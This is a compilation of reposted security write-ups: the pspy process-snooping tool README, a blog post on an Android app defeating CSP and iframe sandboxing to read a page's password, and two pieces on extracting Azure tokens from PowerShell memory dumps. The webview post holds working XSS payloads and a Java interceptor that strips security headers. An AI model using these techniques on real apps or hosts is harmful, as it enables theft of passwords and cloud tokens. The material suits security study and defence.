pspy is a command line tool designed to snoop on processes without the need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute. Great for enumeration of Linux systems in CTFs. Also great for demonstrating to your colleagues why passing secrets as arguments on the command line is a bad idea.
The tool gathers its info from procfs scans. Inotify watchers placed on selected parts of the file system trigger these scans to catch short-lived processes.
Getting started
Download
Get the tool onto the Linux machine you want to inspect. Download the released binaries here:
32 bit big, static version: pspy32 download
64 bit big, static version: pspy64 download
32 bit small version: pspy32s download
64 bit small version: pspy64s download
The statically compiled files should work on any Linux system but are quite huge (~4MB). If size is an issue, try the smaller versions, which depend on libc and are compressed with UPX (~1MB).
Build
Either use Go installed on your system or run the Docker-based build process which was used to create the release. For the latter, ensure Docker is installed, then run make build-build-image to build a Docker image, followed by make build to build the binaries with it.
You can run pspy --help to learn about the flags and their meaning. The summary is as follows:
-p: enables printing commands to stdout (enabled by default)
-f: enables printing file system events to stdout (disabled by default)
-r: list of directories to watch with Inotify. pspy will watch all subdirectories recursively (by default, watches /usr, /tmp, /etc, /home, /var, and /opt).
-d: list of directories to watch with Inotify. pspy will watch these directories only, not the subdirectories (empty by default).
-i: interval in milliseconds between procfs scans. pspy scans regularly for new processes regardless of Inotify events, just in case some events are not received.
-c: print commands in different colors. File system events are not colored anymore; commands have different colors based on process UID.
--debug: prints verbose error messages which are otherwise hidden.
The default settings should be fine for most applications. Watching files inside /usr is most important, since many tools will access libraries inside it.
Some more complex examples:
# print both commands and file system events and scan procfs every 1000 ms (=1sec)
./pspy64 -pf -i 1000
# place watchers recursively in two directories and non-recursively into a third
./pspy64 -r /path/to/first/recursive/dir -r /path/to/second/recursive/dir -d /path/to/the/non-recursive/dir
# disable printing discovered commands but enable file system events
./pspy64 -p=false -f
Examples
Cron job watching
To see the tool in action, just clone the repo and run make example (Docker needed). It is well known that passing passwords as command line arguments is not safe, and the example can be used to demonstrate it. The command starts a Debian container in which a secret cron job, run by root, changes a user password every minute. pspy runs in the foreground, as user myuser, and scans for processes. You should see output similar to this:
~/pspy (master) $ make example
[...]
docker run -it --rm local/pspy-example:latest
[+] cron started
[+] Running as user uid=1000(myuser) gid=1000(myuser) groups=1000(myuser),27(sudo)
[+] Starting pspy now...
Watching recursively : [/usr /tmp /etc /home /var /opt] (6)
Watching non-recursively: [] (0)
Printing: processes=true file-system events=false
2018/02/18 21:00:03 Inotify watcher limit: 524288 (/proc/sys/fs/inotify/max_user_watches)
2018/02/18 21:00:03 Inotify watchers set up: Watching 1030 directories - watching now
2018/02/18 21:00:03 CMD: UID=0 PID=9 | cron -f
2018/02/18 21:00:03 CMD: UID=0 PID=7 | sudo cron -f
2018/02/18 21:00:03 CMD: UID=1000 PID=14 | pspy
2018/02/18 21:00:03 CMD: UID=1000 PID=1 | /bin/bash /entrypoint.sh
2018/02/18 21:01:01 CMD: UID=0 PID=20 | CRON -f
2018/02/18 21:01:01 CMD: UID=0 PID=21 | CRON -f
2018/02/18 21:01:01 CMD: UID=0 PID=22 | python3 /root/scripts/password_reset.py
2018/02/18 21:01:01 CMD: UID=0 PID=25 |
2018/02/18 21:01:01 CMD: UID=??? PID=24 | ???
2018/02/18 21:01:01 CMD: UID=0 PID=23 | /bin/sh -c /bin/echo -e "KI5PZQ2ZPWQXJKEL\nKI5PZQ2ZPWQXJKEL" | passwd myuser
2018/02/18 21:01:01 CMD: UID=0 PID=26 | /usr/sbin/sendmail -i -FCronDaemon -B8BITMIME -oem root
2018/02/18 21:01:01 CMD: UID=101 PID=27 |
2018/02/18 21:01:01 CMD: UID=8 PID=28 | /usr/sbin/exim4 -Mc 1enW4z-00000Q-Mk
First, pspy prints all currently running processes, each with PID, UID and the command line. When pspy detects a new process, it adds a line to this log. In this example, you find a process with PID 23 which seems to change the password of myuser. This is the result of a Python script used in root's private crontab /var/spool/cron/crontabs/root, which executes this shell command (check the crontab and script). Note that myuser can see neither the crontab nor the Python script. With pspy, it can see the commands nevertheless.
CTF example from Hack The Box
Below is an example from the machine Shrek from Hack The Box. In this CTF challenge, the task is to exploit a hidden cron job that's changing ownership of all files in a folder. The vulnerability is the insecure use of a wildcard together with chmod (details for the interested reader). It requires substantial guesswork to find and exploit it. With pspy though, the cron job is easy to find and analyse:
How it works
Tools exist to list all processes executed on Linux systems, including those that have finished. For instance, there is forkstat. It receives notifications from the kernel on process-related events such as fork and exec. These tools require root privileges, but that should not give you a false sense of security. Nothing stops you from snooping on the processes running on a Linux system. A lot of information is visible in procfs as long as a process is running. The only problem is that you have to catch short-lived processes in the very short time span in which they are alive. Scanning the /proc directory for new PIDs in an infinite loop does the trick, but consumes a lot of CPU.
A stealthier way is to use the following trick. Processes tend to access files such as libraries in /usr, temporary files in /tmp, log files in /var, and so on. Using the inotify API, you can get notifications whenever these files are created, modified, deleted, accessed, etc. Linux does not require privileged users for this API, since it is needed for many innocent applications (such as text editors showing you an up-to-date file explorer). Thus, while non-root users cannot monitor processes directly, they can monitor the effects of processes on the file system. We can use the file system events as a trigger to scan /proc, hoping that we can do it fast enough to catch the processes. This is what pspy does.
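To make the idea concrete, here is a minimal Python sketch of the naive procfs-polling half of this approach. pspy itself is written in Go and adds the inotify triggers described above; this plain polling loop is for illustration only.

#!/usr/bin/env python3
# Repeatedly diff the numeric entries in /proc and print the UID and cmdline
# of any PID that appeared since the last scan (assumes Linux, Python 3).
import os
import time

def snapshot():
    pids = {}
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            with open(f"/proc/{entry}/cmdline", "rb") as f:
                cmd = f.read().replace(b"\x00", b" ").decode(errors="replace").strip()
            uid = os.stat(f"/proc/{entry}").st_uid
            pids[entry] = (uid, cmd)
        except OSError:
            pass  # process exited between listdir() and the reads
    return pids

seen = snapshot()
while True:
    current = snapshot()
    for pid, (uid, cmd) in current.items():
        if pid not in seen:
            print(f"CMD: UID={uid} PID={pid} | {cmd}")
    seen = current
    time.sleep(0.05)  # pspy instead wakes up on inotify events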
Even with this approach, there is no guarantee you won't miss a process, but the chances seem to be good in my experiments. In general, the longer a process runs, the greater the chance of catching it.
Misc
Logo: "By Creative Tail [CC BY 4.0 (http://creativecommons.org/licenses/by/4.0)], via Wikimedia Commons" (link)
Sursa: https://github.com/DominicBreuker/pspy
-
Android Webview Exploited
How an android app can bypass CSP, iframe sandbox attributes, etc. to compromise the page loaded in its webview, despite the classic protections being in place.
qreoct 24 Mar 2020 • 20 min read
There are plenty of articles explaining the security issues with android webview, like this article & this one. Many of these resources talk about the risks that an untrusted page, loaded inside a webview, poses to the underlying app. The threats become more prominent especially when javascript and/or the javascript interface is enabled on the webview. In short, having javascript enabled & not properly fortified allows for execution of arbitrary javascript in the context of the loaded page, making it quite similar to any other page that may be vulnerable to an XSS. And again, very simply put, having the javascript interface enabled allows for potential code execution in the context of the underlying android app.
In many of the resources that I came across, the situation was such that the victim was the underlying android app, inside whose webview a page would open, either from the app's own domain or from an external source/domain. The attacker was an entity external to the app, such as an actor exploiting a potential XSS on the page loaded from the app's domain (or the third-party domain serving the page inside the webview itself acting maliciously). The attack vector was the vulnerable/malicious page loaded in the webview.
This blog talks about a different attack scenario!
Victim: Not the underlying android app, but the page itself that is being loaded in the webview.
Attacker: The underlying android app, in whose webview the page is being loaded.
Attack vector: The vulnerable/malicious page loaded in the webview (through the abuse of insecure implementations of some APIs).
The story line
A certain product needs to integrate with a huge business. Let us call this huge business BullyGiant & the certain product AppAwesome from this point on. Many users have an account on both AppAwesome & BullyGiant. The flow involves such users of BullyGiant checking out on their payments page with AppAwesome. Every transaction on AppAwesome must be authenticated & authorized by the user by entering their password on AppAwesome's checkout page, which appears before any transaction is allowed to go through.
AppAwesome cares about the security of its customers, so it proposes the below security measures to anyone who wants to integrate with it, especially around AppAwesome's checkout page:
Loading the checkout page using AppAwesome's SDK. All of the page & its contents are sandboxed & controlled by the SDK. This approach allows for maximum security & the best user experience.
Loading the checkout page in the underlying browser (or custom Chrome tabs, if available). This approach again has quite decent security (limited, of course, by the underlying browser's security) but not a very good user experience.
Loading the checkout page in the webview of the integrating app. This is comparatively the most insecure of the above proposals, although it offers a better user experience than the second approach mentioned above.
Now the deal is that AppAwesome is really very keen on securing its own customers' financial data & hence very strongly recommends usage of its SDK.
BullyGiant on the other hand, for some reason (hopefully justified), does not really want to abide by the secure integration proposals from AppAwesome. AppAwesome does have the choice to deny any integration with BullyGiant. However, this integration is really crucial for AppAwesome to provide a superior user experience to its own users & in fact even more crucial for AppAwesome to stay in the game. So AppAwesome gives in & agrees to integrate with BullyGiant on their terms, i.e. using the least secure webview approach. The only thing that protects AppAwesome's customers now is the trust that AppAwesome places in BullyGiant, which is somewhat covered through the legal contracts between AppAwesome & BullyGiant. That's all.
Technical analysis (TL;DR)
Thanks: Badshah & Anoop for helping with the execution of the attack idea. Without your help, this blog post would not have been possible, at least not while it's still relevant.
Below is a technical analysis of why webview is a bad idea. It talks about how a spurious (or compromised) app can abuse webview features to extract sensitive data from the page loaded inside the webview, despite the many security mechanisms that the page might have implemented. We discuss in detail, with many demos, how CSP, iframe sandbox, etc. may be bypassed in an android webview. Every single demo has a linked code base on my Github, so they can be tried out first hand. Also, the below generic scheme is followed (not strictly in that order) throughout the blog:
A simple demo of the underlying concepts on the browser & android webview
Addition of security features to the underlying concepts & then a demo of the same on the browser & android webview
NB: Please ignore all other potential security issues that might be there with the code base/s.
Case 1: No protection mechanisms
Apps used in this section: AppAwesome BullyGiant
AppAwesome when accessed from a normal browser:
Vanilla AppAwesome Landing Page - Browser
And on submitting the above form:
Vanilla AppAwesome Checkout Page - Browser
AppAwesome when accessed from the BullyGiant app:
Vanilla AppAwesome Page - Android Webview
Notice the Authenticate Payment web page is loaded inside a webview of the BullyGiant app. And on submitting the form above:
Vanilla AppAwesome Page - Android Webview
Notice that clicking on the Submit button also displays the content of the password field as a toast message in BullyGiant. This proves how the underlying app is able to sniff any data (sensitive or otherwise) from the page loaded in its webview.
Under the BullyGiant hood
The reason BullyGiant is able to sniff the password field out of the webview is that it is in total control of its own webview & hence can change the properties of the webview, listen to events, etc. That is exactly what it is doing: it enables javascript on its webview & then listens for the onPageFinished event.
Snippet from BullyGiant:
...
final WebView mywebview = (WebView) findViewById(R.id.webView);
mywebview.clearCache(true);
mywebview.loadUrl("http://192.168.1.38:31337/home");
mywebview.getSettings().setJavaScriptEnabled(true);
mywebview.setWebChromeClient(new WebChromeClient());
mywebview.addJavascriptInterface(new AppJavaScriptProxy(this), "androidAppProxy");
mywebview.setWebViewClient(new WebViewClient(){
    @Override
    public void onPageFinished(WebView view, String url) {...}
...
Note that there is addJavascriptInterface as well.
This is what many blogs (quoted in the beginning of this post) talk about, where the loaded web page can potentially be harmful to the underlying app. In our use case, however, it is not of much consequence (from that perspective). All it is used for is to show that BullyGiant can read the contents of the page loaded in the webview. It does so by sending the read content back to android (that's where addJavascriptInterface is used) & having it displayed as a toast message. The other important bit in the BullyGiant code base is the overridden onPageFinished():
...
super.onPageFinished(view, url);
mywebview.loadUrl("javascript:var button = document.getElementsByName(\"submit\")[0];button.addEventListener(\"click\", function(){ androidAppProxy.showMessage(\"Password : \" + document.getElementById(\"password\").value); return false; },false);");
...
That's where the javascript to read the password field from the DOM is injected into the page loaded inside the webview.
The story line continued...
AppAwesome came up with the below solutions to prevent the web page from being read by the underlying app:
Suggestion #1: Use CSP
Use CSP to prevent BullyGiant from executing any javascript whatsoever inside the page loaded in the webview.
Suggestion #2: Use Iframe Sandbox
Load the sensitive page inside of an iframe on the main page in the webview. Use the iframe sandbox attribute to restrict any interactions between the parent window/page & the iframe content.
CSP is a mechanism to prevent execution of untrusted javascript inside a web page, while the sandbox attribute of an iframe is a way to tighten the controls on the page within the iframe. Both are very well explained in many resources, like here.
With all the above restrictions imposed, our goal now is to see whether BullyGiant can still access the AppAwesome page loaded inside the webview. We will analyze how each of the suggested solutions works in a normal browser & in a webview, & how BullyGiant could access the loaded pages, if at all.
Exploring CSP
With Inline JS
Apps used in this section: AppAwesome BullyGiant
Before moving on to the demo of the CSP implementation & its effects on the Android Webview, let's look at how a non-CSP page behaves in a normal (non-webview) browser & in a webview. To demo this we have added an inline JS handler that alerts 1 when the Submit button is clicked, before proceeding to the checkout page.
AppAwesome code snippet:
<!DOCTYPE HTML>
...
<script type="text/javascript">
function f(){
    alert(1);
}
</script>
...
<input type="submit" value="Submit" name="submit" onclick="f();">
...
</html>
AppAwesome when accessed from the browser & the Submit button is clicked:
Vanilla AppAwesome Page - Inline JS => Firefox 74.0
AppAwesome when accessed from the BullyGiant app:
Vanilla AppAwesome Page - Inline JS => Android Webview
The above suggests that so far there is no change in how the page is treated by the two environments. Now let's check the change in behavior (if any) when CSP headers are implemented.
With CSP Implemented
Apps used in this section: AppAwesome BullyGiant
Browser
A quick demo of these features in a traditional browser (not webview) suggests that these controls are indeed useful (when implemented the right way) for what they are intended to do.
AppAwesome when accessed from a browser:
CSP AppAwesome page - Inline JS => Firefox 74.0
Notice the Content Security Policy violations. These violations happen because of the CSP response headers, which are returned by the backend & enforced by the browser.
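The linked demo repositories contain the actual AppAwesome backend. Purely as an illustration of how such headers might be produced, here is a minimal Flask sketch of a backend that attaches a CSP header to every response; the route, page body, and policy string are assumptions, not the demo's exact code.

from flask import Flask

app = Flask(__name__)

@app.route("/home")
def home():
    # A form with an inline onclick handler, like the demo page above.
    return '<input type="submit" value="Submit" name="submit" onclick="f();">'

@app.after_request
def add_csp(response):
    # No 'unsafe-inline' in script-src, so the inline handler above is
    # blocked and the browser raises a CSP violation.
    response.headers["Content-Security-Policy"] = "default-src 'self'; script-src 'self'"
    return response

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=31337)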
Response headers from AppAwesome:
CSP AppAwesome page - Inline JS => Firefox 74.0
Android Webview
AppAwesome when accessed from BullyGiant gives the same Authenticate Payment page as above & the exact same CSP errors too! This can be seen from the below screenshot of a remote debugging session taken from Chrome 80.0. (Firefox was not chosen for remote debugging because I was too lazy to set up remote debugging on Firefox, and a Firefox setup on the AVD would have been required too, as per this note from the FF settings page. Also, further down, for all the demos we use adb logs instead of remote debugging sessions to show browser console messages.)
On Google Chrome 80.0
Hence, we see that CSP does prevent execution of inline JS inside an android webview, very much like a normal browser does.
Exploring CSP
With Injected JS
Apps used in this section: AppAwesome AppAwesome (with XSS-Auditor disabled) BullyGiant (without XSS payload) BullyGiant (with XSS payload)
AppAwesome has been made deliberately vulnerable to a reflected XSS through a query parameter, name, added to the home page. Also, all inline JS has been removed from this page to further emphasize CSP's impact on injected JS.
AppAwesome when accessed from the browser while the name query parameter's value is John Doe:
On Google Chrome 80.0
Now, for the sake of the demo, we will exploit the XSS-vulnerable name query param to add an onclick event to the Submit button such that clicking it alerts "injected 1".
XSS exploit payload:
<body onload="f()"><script type="text/javascript">function f(){var button=document.getElementsByName("submit")[0];button.addEventListener("click", function(){ alert("injected 1"); return false; },false);}</script>
AppAwesome when accessed from the browser & exploited with the above payload (in the name query parameter):
Vanilla AppAwesome Page - Exploited XSS => Firefox
AppAwesome when accessed from BullyGiant, without exploiting the XSS:
Vanilla AppAwesome Page - Vulnerable param => Android Webview
AppAwesome when accessed from BullyGiant, while attempting to exploit the XSS, produces the same screen as above. However, contrary to the script injection that was successful in the case of a normal browser, this time clicking on the Submit button didn't execute the payload at all; we were instead taken directly to the checkout page. The adb logs, however, did produce an interesting message, as shown below:
Vanilla AppAwesome Page - Exploited XSS => Android Webview
The adb log message is:
03-27 12:29:33.672 26427-26427/com.example.webviewinjection I/chromium: [INFO:CONSOLE(9)] "The XSS Auditor refused to execute a script in 'http://192.168.1.35:31337/home?name=<body onload="f()"><script type="text/javascript">function f(){var button=document.getElementsByName("submit")[0];button.addEventListener("click", function(){ alert("injected 1"); return false; },false);}%3C/script%3E' because its source code was found within the request. The auditor was enabled as the server sent neither an 'X-XSS-Protection' nor 'Content-Security-Policy' header.", source: http://192.168.1.35:31337/home?name=<body onload="f()"><script type="text/javascript">function f(){var button=document.getElementsByName("submit")[0];button.addEventListener("click", function(){ alert("injected 1"); return false; },false);}%3C/script%3E (9)
So even without any explicit protection mechanism (like CSP or iframe sandbox), android webview has a default protection mechanism called the XSS Auditor. This, however, has nothing to do with our use case.
Moreover, it interferes with our demo as well. Hence, for now, for the sake of this demo, we will make AppAwesome return the X-XSS-Protection HTTP header, as below, to take care of this issue.
X-XSS-Protection: 0
Note: The XSS Auditor will also be accounted for with a bypass towards the end of the blog.
AppAwesome when accessed now from BullyGiant, while attempting to exploit the XSS:
Vanilla AppAwesome Page - Exploited XSS => Android Webview
Thus we see that the XSS payload works equally well in the Android Webview (of course, with the XSS Auditor intentionally disabled).
Note: If the victim is the page getting loaded inside the webview, it makes absolute sense that its backend would never return any HTTP headers, like the above, that weaken the security of the page itself. We will see why this is irrelevant further down.
The other thing to note is that there was a subtle difference between how the payloads were injected into the vulnerable parameter in the two cases, the browser & the webview. It is important to take note of it because it highlights the very premise of this blog post. In the case of the browser, the attacker is an external party who could send the JS payload to exploit the vulnerable name parameter. Whereas in the case of the android webview, the underlying app itself is the malicious actor & hence it injects the JS payload into the vulnerable name parameter before loading the page in its own webview. This difference will become more prominent as we analyze further cases & how the malicious app leverages its capabilities to exploit the page loaded in the webview.
With CSP Implemented
Apps used in this section: AppAwesome BullyGiant (with XSS payload) BullyGiant (with CSP bypass) BullyGiant (with CSP bypass reading the password field)
Browser
With the appropriate CSP headers in place, inline JS does not work in browsers, as we saw above. What would happen if javascript is injected into a page that has CSP headers? Would it still produce CSP violation errors?
AppAwesome, with the vulnerable name parameter & XSS-Auditor disabled, when accessed in the browser & the name query param exploited with the same XSS payload (as earlier):
CSP AppAwesome Page - Exploited XSS => Firefox
The console error messages are the same as with inline JS. Injected JS does not get executed, as the CSP policy prevents it.
Would the same XSS payload work when the above CSP page is loaded inside an Android Webview?
AppAwesome when accessed from the BullyGiant app that injects the JS payload into the vulnerable name parameter before loading the page in the android webview:
CSP AppAwesome Page - Exploited XSS => Android Webview
The same adb log is produced, confirming that CSP works well even in the case of an injected javascript payload inside a webview.
Note: In the CSP-related examples above (browser or webview), note that CSP kicks in before the page actually gets loaded.
With the above note, some interrelated questions arise:
What would happen if BullyGiant wanted to access the contents of the page after it gets successfully loaded? Could it add javascript to the already loaded page, as if this were being done locally? Would CSP still interfere?
Since the webview is under the total control of the underlying app, in our case BullyGiant, & since there are android APIs available to control the lifecycle of pages loaded inside the webview, BullyGiant can pretty much do whatever it wants with the loaded page's contents.
So instead of injecting the javascript payload into the vulnerable parameter, as in the above example, BullyGiant may choose to inject it directly into the page itself after the page is loaded, without needing to exploit the vulnerable name parameter at all.
AppAwesome when accessed from BullyGiant, which implements the above trick to achieve JS execution despite CSP:
CSP AppAwesome Page - Exploited XSS => Android Webview
The logs still show the below messages:
03-28 17:29:28.372 13282-13282/com.example.webviewinjection D/WebView Console Error:: Refused to execute inline script because it violates the following Content Security Policy directive: "script-src 'self' http://192.168.1.35:31337". Either the 'unsafe-inline' keyword, a hash ('sha256-JkQD9ejf-ohUEh1Jr6C22l1s4TUkBIPWNmho0FNLGr0='), or a nonce ('nonce-...') is required to enable inline execution.
03-28 17:29:28.396 13282-13282/com.example.webviewinjection D/WebView Console Error:: Refused to execute inline event handler because it violates the following Content Security Policy directive: "script-src 'self' http://192.168.1.35:31337". Either the 'unsafe-inline' keyword, a hash ('sha256-...'), or a nonce ('nonce-...') is required to enable inline execution.
BullyGiant still injected the XSS payload into the vulnerable name parameter (we left it there to ensure that CSP was still in action). The above logs are a result & proof of that.
Code snippet from BullyGiant that does the trick:
...
mywebview.setWebViewClient(new WebViewClient(){
    @Override
    public void onPageFinished(WebView view, String url) {
        super.onPageFinished(view, url);
        mywebview.loadUrl(
            "javascript:var button = document.getElementsByName(\"submit\")[0];button.addEventListener(\"click\", function(){ alert(\"injected 1\"); },false);"
        );
    }
});
...
The above PoC shows execution of a simple JS payload that just pops up an alert box. Any other, more complex JS could be executed as well, like reading the contents of the password field on the page using the below payload:
var secret = document.getElementById("password").value; alert(secret);
AppAwesome when accessed from BullyGiant, which attempts to read the password field using the above payload:
CSP AppAwesome Page - Exploited XSS => Android Webview
So the questions above get answered. They are also indicative of an even more interesting question:
Since BullyGiant is in total control of the webview & thus the page loaded within it, would it also be able to modify the whole HTTP response itself?
We will tackle the above question with yet another example. In fact, this time we will talk about the second suggestion, around iframe sandbox, and see if the answer to the above question can be demoed with that. Also, we had left the whole X-XSS-Protection header thing for later; that part will also get covered in the following experiments.
Iframe sandbox attribute
Apps used in this section: AppAwesome Backend (without CSP & with iframe sandbox) AppAwesome Backend (without CSP & with iframe sandbox relaxed) BullyGiant
AppAwesome, which has no CSP headers, has X-XSS-Protection relaxed, & has the below sandbox attributes:
sandbox="allow-scripts allow-top-navigation allow-forms allow-popups"
when loaded in the browser:
AppAwesome Page - Iframe Sandbox => Browser
The child page has the form, which when submitted displays the password on the checkout page inside the iframe:
AppAwesome Page - Iframe Sandbox => Browser
The Access button tries to read the password displayed inside the iframe by reading the DOM of the page loaded in the iframe, using the below JS:
...
<script type="text/javascript">
function accessIframe() {
    document.getElementById('myIframe').style.background = "green"
    alert(document.getElementById('myIframe').contentDocument.getElementById('data').innerText);
}
</script>
...
Note that even in the absence of CSP headers, clicking the Access button gives:
AppAwesome Page - Iframe Sandbox => Browser
The console message is:
TypeError: document.getElementById(...).contentDocument is null
This happens because of the iframe's sandbox attribute. The iframe sandbox can be relaxed by using:
<iframe src="http://192.168.1.34:31337/child?secret=iframeData" frameborder="10" id="myIframe" sandbox="allow-same-origin allow-top-navigation allow-forms allow-popups">
AppAwesome, with the relaxed iframe sandbox attribute, allows the JS in the parent page to access the iframe's DOM, thus producing the alert box as expected, with the mysecret value:
AppAwesome Page - Iframe Sandbox => Browser
Also, just a side note: using the below would have relaxed the sandbox to the exact same effect, as has also been mentioned here:
<iframe src="http://192.168.1.34:31337/child?secret=iframeData" frameborder="10" id="myIframe" sandbox="allow-scripts allow-same-origin allow-top-navigation allow-forms allow-popups">
Repeating the same experiment on an android webview produces the exact same results.
AppAwesome, with the relaxed iframe sandbox attribute, when accessed from BullyGiant:
AppAwesome Page - Iframe Sandbox Relaxed => Android Webview
AppAwesome, with no CSP headers, X-XSS-Protection relaxed, & the below sandbox attributes:
sandbox="allow-scripts allow-top-navigation allow-forms allow-popups"
when accessed from BullyGiant:
AppAwesome Page - Iframe Sandbox => Android Webview
The error message in the console is:
03-29 15:18:38.292 11081-11081/com.example.webviewinjection D/WebView Console Error:: Uncaught SecurityError: Failed to read the 'contentDocument' property from 'HTMLIFrameElement': Sandbox access violation: Blocked a frame at "http://192.168.1.34:31337" from accessing a frame at "http://192.168.1.34:31337". The frame being accessed is sandboxed and lacks the "allow-same-origin" flag.
Now, if BullyGiant were to bypass the above restriction, as it did in the case of the CSP bypass, it could again take the same route of injecting some javascript inside the iframe itself after the checkout page is loaded.
Note: I haven't personally tried this approach, but conceptually it should work. Too lazy to do that right now!
But instead of doing that, what if BullyGiant were to take an even simpler approach and bypass everything once & for all? Since the webview is under the total control of BullyGiant, could it not intercept the response before rendering it in the webview and remove all the troublemaking headers altogether?
Manipulation of the HTTP response
Apps used in this section: AppAwesome Backend (with all protection mechanisms in place) BullyGiant (that bypasses all the above mechanisms) BullyGiant app with a toast
Let's make this case the most secure of all the previous ones. This time AppAwesome implements all the secure mechanisms on the page. Below is a list of the changes:
It uses CSP => so that no unwanted JS (inline or injected) can be executed.
It uses strict iframe sandbox attributes => so that the parent page cannot access the contents of the iframe, despite them being from the same domain.
It does not set the X-XSS-Protection: 0 header => this was an assumption we had made above for the sake of our demos. In the real world, an app that wishes to avoid an XSS scenario would deploy every possible/feasible mechanism to prevent it from happening. So AppAwesome now does not return this header at all.
It does not have the Access button in the DOM with the supporting inline JS => again, something we had used in a few of our (most recent) previous examples for the sake of the demo. In the real world, in the context of our story, it would not make sense for AppAwesome to leave an Access button with the supporting inline JS to access the iframe.
AppAwesome when accessed from the browser:
AppAwesome Page - FullBlown => Browser
Notice that all the security measures mentioned in the pointers above are implemented. CSP headers are in place, there's no Access button or supporting inline JS, no X-XSS-Protection header, & the strict iframe sandbox attribute is present as well.
BullyGiant handles all of the above troublemakers by rewriting everything before any response is rendered in the webview at all. AppAwesome 0, BullyGiant 1!
AppAwesome when accessed from BullyGiant:
AppAwesome Page - FullBlown => Android Webview
Notice that the X-XSS-Protection: 0 header has been added! The CSP header is no longer present! And there's (the old familiar) brand new Access button on the page as well. Clicking the Access button after the form inside the iframe is loaded gives:
AppAwesome Page - FullBlown => Android Webview
Code snippet from BullyGiant that does all of the above:
...
class ChangeResponse implements Interceptor {
    @Override
    public Response intercept(Interceptor.Chain chain) throws IOException {
        Response originalResponse = chain.proceed(chain.request());
        String responseString = originalResponse.body().string();
        Document doc = Jsoup.parse(responseString);
        doc.getElementById("myIframe").removeAttr("sandbox");
        MediaType contentType = originalResponse.body().contentType();
        ResponseBody body = ResponseBody.create(doc.toString(), contentType);
        return originalResponse.newBuilder()
                .body(body)
                .removeHeader("Content-Security-Policy")
                .header("X-XSS-Protection", "0")
                .build();
    }
};
...
private WebResourceResponse handleRequestViaOkHttp(@NonNull String url) {
    try {
        final OkHttpClient client = new OkHttpClient.Builder()
                .addInterceptor(new LoggingInterceptor())
                .addInterceptor(new ChangeResponse())
                .build();
        final Call call = client.newCall(new Request.Builder()
                .url(url)
                .build()
        );
        final Response response = call.execute();
        return new WebResourceResponse("text/html", "utf-8",
                response.body().byteStream()
        );
    } catch (Exception e) {
        return null; // return response for bad request
    }
}
...
mywebview.setWebViewClient(new WebViewClient(){
    @SuppressWarnings("deprecation") // From API 21 we should use another overload
    @Override
    public WebResourceResponse shouldInterceptRequest(@NonNull WebView view, @NonNull String url) {
        return handleRequestViaOkHttp(url);
    }
...
What the above does is intercept the HTTP request that the webview would make & pass it over to OkHttp, which then handles all the HTTP requests & responses from that point on, before finally returning the modified HTTP response to the webview.
Ending note: Before we end, a final touch. BullyGiant was able to access the whole of the page loaded inside the webview. This was demoed using JS alerts on the page itself. The content read from the webview could also be displayed as native toast messages, to make it more convincing for the business leaders (or anyone else), accentuating that the sensitive details from AppAwesome are actually leaked over to BullyGiant.
AppAwesome when accessed from BullyGiant:
AppAwesome Page - FullBlown => Android Webview - Raising a toast!
Conclusion
Since the webview is under the total control of the underlying android app, it is wise not to share any sensitive data on a page getting loaded inside a webview.
Collected on the way
git worktrees
what are git tags & how to maintain different versions using tags
creating git tags
checking out git tags
pushing git tags
tags can be viewed simply with git tag
git tags can not be committed to => for any changes to a tag, commit the changes on an existing or a new branch and then make a tag out of it; delete the old tag after that if you want
deleting a branch (local & remote)
renaming a branch (local & remote)
adding chrome console messages to adb logs
chrome's remote debugging feature
Sursa: http://www.nuckingfoob.me/android-webview-csp-iframe-sandbox-bypass/index.html
-
-
AzureTokenExtractor
Extracts Azure authentication tokens from PowerShell process minidumps. For more information on Azure authentication tokens and the process for using this tool, check out the corresponding blog post at https://www.lares.com/blog/hunting-azure-admins-for-vertical-escalation-part-2/.
Usage
USAGE: python3 azure-token-extractory.py [OPTIONS]
OPTIONS:
-d, --dump Target minidump file
-o, --outfile File to save extracted Azure context
Sursa: https://github.com/LaresLLC/AzureTokenExtractor
-
Hunting Azure Admins for Vertical Escalation: Part 2
RJ McDown April 2, 2020
This post is part 2 in the Hunting Azure Admins for Vertical Escalation series. Part 1 of this series detailed the usage and functionality of Azure authentication tokens, the file location that caches the tokens during a user session ("%USERPROFILE%\.Azure\TokenCache.dat"), methods for locating user-exported Azure context files containing tokens, and leveraging them to bypass password authentication as well as multi-factor authentication. This blog post will focus on a methodology for extracting Azure authentication tokens when the end user is disconnected and hasn't exported an Azure context file.
Disconnected Azure PowerShell Sessions
When a user connects to Azure from PowerShell, a TokenCache.dat file is created and populated with the user's Azure authentication token. This is detailed at great length in Part 1. However, if the user disconnects their Azure session, the TokenCache.dat file is stripped of the token. So, obtaining an Azure cached token from the TokenCache.dat file requires an active logged-in session. What can be done in a scenario where the Azure PowerShell session is disconnected and the user hasn't saved an Azure context file to disk?
PowerShell Process Memory
Thinking about traditional Windows credential theft and lateral movement brings to mind the LSASS.exe process and Mimikatz. In short, Windows has historically stored hashed and cleartext account credentials in the LSASS.exe process memory space, and penetration testers have leveraged tools like Mimikatz to extract those credentials. This has gone on for years and has forced Microsoft into developing new security controls around the storage and access of credentials in Windows. On newer Windows systems, you will likely only extract hashed credentials from accounts that are actively logged onto the machine, as Windows has improved its scrubbing of credentials from memory after a user disconnects.
This leads us to the PowerShell process and the identifying information it maintains in memory. Let's start by dumping the PowerShell process memory to disk in minidump format. Although we used a custom tool, SnappyKatz, to dump the PowerShell process memory, other publicly available tools exist that can do this, such as ProcDump from the Sysinternals Suite. We can then use our favorite hex editor to explore the contents of the dump.
Referring back to the contents of the TokenCache.dat file, we can quickly search for keywords to locate the Azure context JSON in the dump. This is great, but the required CacheData field that would contain the base64-encoded cached token was empty. At first, it was thought the field was empty because the session had been disconnected and due diligence had been done on the part of Microsoft to remove sensitive information from memory. In true Microsoft fashion, however, the missing cached token data was identified, in full, at a different offset in the dump. We had now located the two pieces of information needed to reconstruct an Azure context file. To create the context file, we saved the JSON context data found at the first location to a file and populated the CacheData field with the base64-encoded token cache located at the second location.
Automating Extraction
In order to save a tremendous amount of time on engagements, we created a tool in Python that automates the extraction of the required data and properly exports it to a usable Azure context JSON file.
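The published AzureTokenExtractor tool (linked below) handles the real minidump layout; purely as an illustration of the search idea, here is a rough Python sketch that scans the raw dump bytes for a context-JSON marker and for long base64 runs that could be the serialized token cache. The "TokenCache" marker string and the base64 length heuristic are assumptions for illustration, not the tool's actual logic.

import re
import sys

data = open(sys.argv[1], "rb").read()

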